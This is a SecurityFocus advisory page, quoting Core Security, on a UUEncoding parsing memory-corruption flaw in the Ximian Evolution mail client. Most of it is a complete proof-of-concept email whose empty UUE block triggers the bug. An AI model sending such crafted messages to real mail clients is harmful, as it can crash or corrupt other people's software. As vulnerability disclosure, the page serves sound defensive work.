Ximian Evolution UUEncoding Parsing Memory Corruption Vulnerability

The following is taken from the advisory published by Core Security Technologies (see reference section):

The following email will reproduce this vulnerability, note that
an empty line is required before and after the UUE header line.

>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit

begin 600

end

--=-mTDu5zdJIsixETTwCF5Y--


 

Privacy Statement
Copyright 2010, SecurityFocus